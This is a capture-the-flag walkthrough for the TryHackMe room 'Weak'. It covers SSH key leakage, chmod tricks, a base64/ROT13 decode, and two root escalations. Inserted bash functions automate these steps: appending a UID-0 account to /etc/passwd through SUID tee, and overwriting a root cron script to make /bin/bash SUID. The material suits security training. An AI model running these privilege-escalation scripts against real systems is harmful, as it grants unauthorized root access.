Weak [TryHackMe] Walkthrough

Siddharth Johri
Apr 1, 2023


I recently developed a THM room for a CTF event at my college, and here is the walkthrough!

Link: https://tryhackme.com/jr/weak

Note: The box takes up to 5–7 minutes to properly start all services, so you have to be a little patient :)

Recon

A basic port scan of the box reveals that ports 22 and 80 are open, running SSH and HTTP respectively.

Enumeration

Http

A very basic-looking template.

The HTTP page has no active buttons or links, so the next steps are reviewing the page source and directory busting.

User: tyrone

This HTML comment suggests that tyrone is a valid user on the box.

Meanwhile, directory busting reveals a file called impressum.txt,

which conveniently looks like an SSH private key.

Putting two and two together, we can log in as tyrone with that key.

chmod 600 on the key first, as always, and the login works. Yay!
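
The whole path from the page source to an SSH shell, written up as an added example (these are not the original walkthrough's commands). It assumes the target address is passed as the first argument, that the leaked key is served at /impressum.txt, that the user is tyrone, and that a wordlist exists at /usr/share/wordlists/dirb/common.txt; the network-facing functions need the box, while prepare_key can be tried on any local file.

```bash
#!/bin/bash
# Added example, not from the original walkthrough: enumeration to SSH login.
# Assumed names: target in $1, key at /impressum.txt, user tyrone, and a
# dirb wordlist at /usr/share/wordlists/dirb/common.txt.

# Pull single-line HTML comments out of the page source; on the box one of
# them names the user.
html_comments() {
  curl -s "http://$1/" | grep -o '<!--.*-->'
}

# Directory-bust for files with text and key-style extensions.
dirbust() {
  gobuster dir -u "http://$1/" -w /usr/share/wordlists/dirb/common.txt -x txt,pem,key -q
}

# Fetch the leaked key to a local path ($2).
fetch_key() {
  curl -s -o "$2" "http://$1/impressum.txt"
}

# ssh refuses a key that others can read ("UNPROTECTED PRIVATE KEY FILE"),
# so set mode 0600 first, after checking the file really is a PEM private
# key. Prints the resulting mode (600) on success, returns 1 otherwise.
prepare_key() {
  local key="$1"
  grep -q -- '-----BEGIN .*PRIVATE KEY-----' "$key" || return 1
  chmod 600 "$key"
  stat -c '%a' "$key" 2>/dev/null || stat -f '%Lp' "$key"
}

# Log in with the key; IdentitiesOnly stops ssh from offering agent keys first.
ssh_as_tyrone() {
  ssh -i "$2" -o IdentitiesOnly=yes "tyrone@$1"
}

# Usage on the box (address is a placeholder):
#   html_comments 10.10.10.10
#   dirbust 10.10.10.10
#   fetch_key 10.10.10.10 ./id_tyrone && prepare_key ./id_tyrone \
#     && ssh_as_tyrone 10.10.10.10 ./id_tyrone
```

prepare_key is the step people trip over: a key downloaded with curl lands with the umask default (usually 644), and ssh silently ignores it with a permissions warning until it is tightened to 600.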

More Enumeration

After login, local.txt is immediately found in /home/tyrone/.

/var/www/html/ also contains a file called flag2, which we are not allowed to read.

Looking closer, it is owned by tyrone himself, so we can change its permissions and read it.

Don't try to copy the flag, please.

A quick grep through the file contents reveals two more files, which can be read the same way once we change their permissions.

Four flags down!
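
The same trick, reproduced in a scratch directory as an added example (not code from the original walkthrough): a file we own but cannot read gets chmod'ed back to readable, and the paths mentioned inside it are followed and fixed the same way. The file names and flag values are constructed placeholders; the real flags are not shown.

```bash
#!/bin/bash
# Added example, not from the original walkthrough: owner-but-unreadable
# files, fixed with chmod and chained through grep. Contents are constructed.

# Build the scratch layout: flag2 (mode 000) mentions two more locked files.
make_scratch() {
  local d
  d=$(mktemp -d)
  printf 'THM{constructed-flag2}\nsee also: %s/flag3 and %s/flag4\n' "$d" "$d" > "$d/flag2"
  printf 'THM{constructed-flag3}\n' > "$d/flag3"
  printf 'THM{constructed-flag4}\n' > "$d/flag4"
  chmod 000 "$d/flag2" "$d/flag3" "$d/flag4"
  echo "$d"
}

# The check that matters: chmod is allowed by ownership, not by the current
# mode bits, so a mode-000 file we own is ours to reopen.
owned_by_me() {
  [ -O "$1" ]
}

# Give the owner (only) read access back and print the file.
read_owned_file() {
  owned_by_me "$1" || return 1
  chmod u+r "$1"
  cat "$1"
}

# Pull absolute paths out of the content and read each one the same way.
follow_references() {
  read_owned_file "$1" | grep -o '/[^ ]*' | while read -r p; do
    if [ -e "$p" ]; then read_owned_file "$p"; fi
  done
}

# Usage: d=$(make_scratch); follow_references "$d/flag2"
```

chmod u+r rather than chmod 644 keeps the files private to tyrone, which is worth the habit on a shared box even during a CTF.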

The root directory has a text file that tyrone can read but that is clearly not a flag.

baseRot1364 looks like a base64 wrapper around ROT13.

Base64, then ROT13, then Base64.

Let's get that flag down!
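
The layering above, reconstructed as an added example (not the room's own code): encode is base64, ROT13 on the base64 text, base64 again, and decode peels the layers in reverse. The plaintext is a constructed sample, not the flag. The encode side is an assumption drawn from the name and the decode order described; only the decode chain is what the box needs.

```bash
#!/bin/bash
# Added example, not from the original walkthrough: baseRot1364 as
# base64(rot13(base64(x))) and its inverse. Sample input is constructed.

# ROT13 touches only letters; base64's digits, +, / and = pass through.
rot13() { tr 'A-Za-z' 'N-ZA-Mn-za-m'; }

# Encode: base64, rot13 the base64 text, base64 again.
# tr -d '\n' keeps each layer on one line regardless of base64 wrapping.
baserot1364_encode() {
  printf '%s' "$1" | base64 | tr -d '\n' | rot13 | base64 | tr -d '\n'
}

# Decode: reverse order. ROT13 is its own inverse, so the middle step is the same.
baserot1364_decode() {
  printf '%s' "$1" | base64 -d | rot13 | base64 -d
}

# Worked value: "hi" -> base64 "aGk=" -> rot13 "nTx=" -> base64 "blR4PQ==".
# Usage: baserot1364_decode 'blR4PQ=='   # prints hi
```

If a single base64 -d of the file already yields readable text, there is no ROT13 layer and the name is a red herring; the middle step is what makes the first decode look like garbage.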

Privilege Escalation

The user tyrone has no sudo rights, and there are no credentials lying around in any directory.

Listing SUID binaries with the following command shows the executables that run as their owner regardless of who invokes them:

find / -perm -4000 2>/dev/null

/usr/bin/tee stands out, and GTFOBins has an entry for it:

https://gtfobins.github.io/gtfobins/tee/#suid

With SUID tee we can append to, or overwrite, any file on the filesystem, which gives an easy privilege escalation through /etc/passwd.
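
The /etc/passwd route spelled out, as an added example rather than the walkthrough's own commands. It assumes tee on the box is SUID root and that OpenSSL 1.1.1 or newer is available to hash the password; the target file is a parameter so the functions can be rehearsed on a scratch copy before touching the real one. User and password names are placeholders.

```bash
#!/bin/bash
# Added example, not from the original walkthrough: SUID tee to a UID-0
# account, following the GTFOBins "tee -a" pattern. Assumes SUID root tee
# and openssl; the target path is an argument (try it on a copy first).

# Build a passwd(5) line for a UID 0 / GID 0 user with a SHA-512 crypt hash.
build_passwd_line() {
  local user="$1" pass="$2" hash
  hash=$(openssl passwd -6 "$pass") || return 1
  printf '%s:%s:0:0:root:/root:/bin/bash' "$user" "$hash"
}

# Append the line with tee -a. Appending rather than overwriting keeps every
# existing account intact, which matters when the file is the real /etc/passwd.
add_root_user() {
  local target="$1" user="$2" pass="$3" line
  line=$(build_passwd_line "$user" "$pass") || return 1
  printf '%s\n' "$line" | tee -a "$target" >/dev/null
}

# Check: the entry exists and really carries UID 0 and GID 0.
verify_root_entry() {
  awk -F: -v u="$1" '$1 == u && $3 == 0 && $4 == 0 { found = 1 } END { exit !found }' "$2"
}

# Usage on the box (placeholders): add_root_user /etc/passwd pwned Passw0rd && su pwned
```

Putting the hash directly in /etc/passwd works because the password field is still honoured when it is not "x"; shadow is never touched.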

However, there is another privilege escalation vector I would like to show.

The crontab is unreadable. Weird.

Let's monitor processes with pspy to see what cron is running:

https://github.com/DominicBreuker/pspy

Something is triggering a script periodically. The UID is 0, so it is probably root.

Awesome, let's overwrite it.
A custom command overwrites script.sh with a payload that sets the SUID bit on /bin/bash.
As soon as the clock hits 00 and cron fires the job, bash should become SUID.
Bash is now SUID.

Root access is now available via the GTFOBins bash SUID command:

https://gtfobins.github.io/gtfobins/bash/#suid
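
The cron route as an added example (not the walkthrough's own one-liner). It assumes what pspy showed on the box: a UID-0 cron job running a script that our user can write. The directory and script paths are placeholders; the payload is the chmod u+s on /bin/bash used above, and the final shell is the GTFOBins bash -p.

```bash
#!/bin/bash
# Added example, not from the original walkthrough: writable root cron
# script to SUID bash. Paths are placeholders; assumes a root cron job.

# List scripts the current user can write under the given directories
# (defaults to the usual cron locations). Candidates for a root job to run.
find_writable_cron_scripts() {
  [ $# -eq 0 ] && set -- /etc/cron.d /etc/cron.hourly /etc/cron.daily /var/spool/cron
  find "$@" -type f 2>/dev/null | while read -r f; do
    if [ -w "$f" ]; then printf '%s\n' "$f"; fi
  done
}

# Replace the script body with the payload, keeping a backup of the original
# in $TMPDIR so the job's normal behaviour can be restored afterwards.
plant_suid_payload() {
  local script="$1" backup
  [ -w "$script" ] || return 1
  backup="${TMPDIR:-/tmp}/$(basename "$script").bak"
  cp "$script" "$backup"
  printf '#!/bin/bash\nchmod u+s /bin/bash\n' > "$script"
}

# Poll for the SUID bit; cron fires at the next minute boundary, so allow
# up to 90 seconds by default. Returns 0 once the bit is set.
wait_for_suid() {
  local f="$1" tries="${2:-90}"
  while [ "$tries" -gt 0 ]; do
    [ -u "$f" ] && return 0
    sleep 1
    tries=$((tries - 1))
  done
  return 1
}

# Usage on the box (placeholder path):
#   plant_suid_payload /opt/script.sh && wait_for_suid /bin/bash && /bin/bash -p
# -p keeps the effective UID of 0 instead of dropping to the real UID.
```

Without -p, bash resets its effective UID to the caller's on startup, which is why an SUID copy of bash looks broken until the flag is added.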

cd to /root and grab proof.txt, ezpz.

Any comments, suggestions or critique can be sent to me via Twitter, LinkedIn or by dropping a comment here.

@JodisKripe

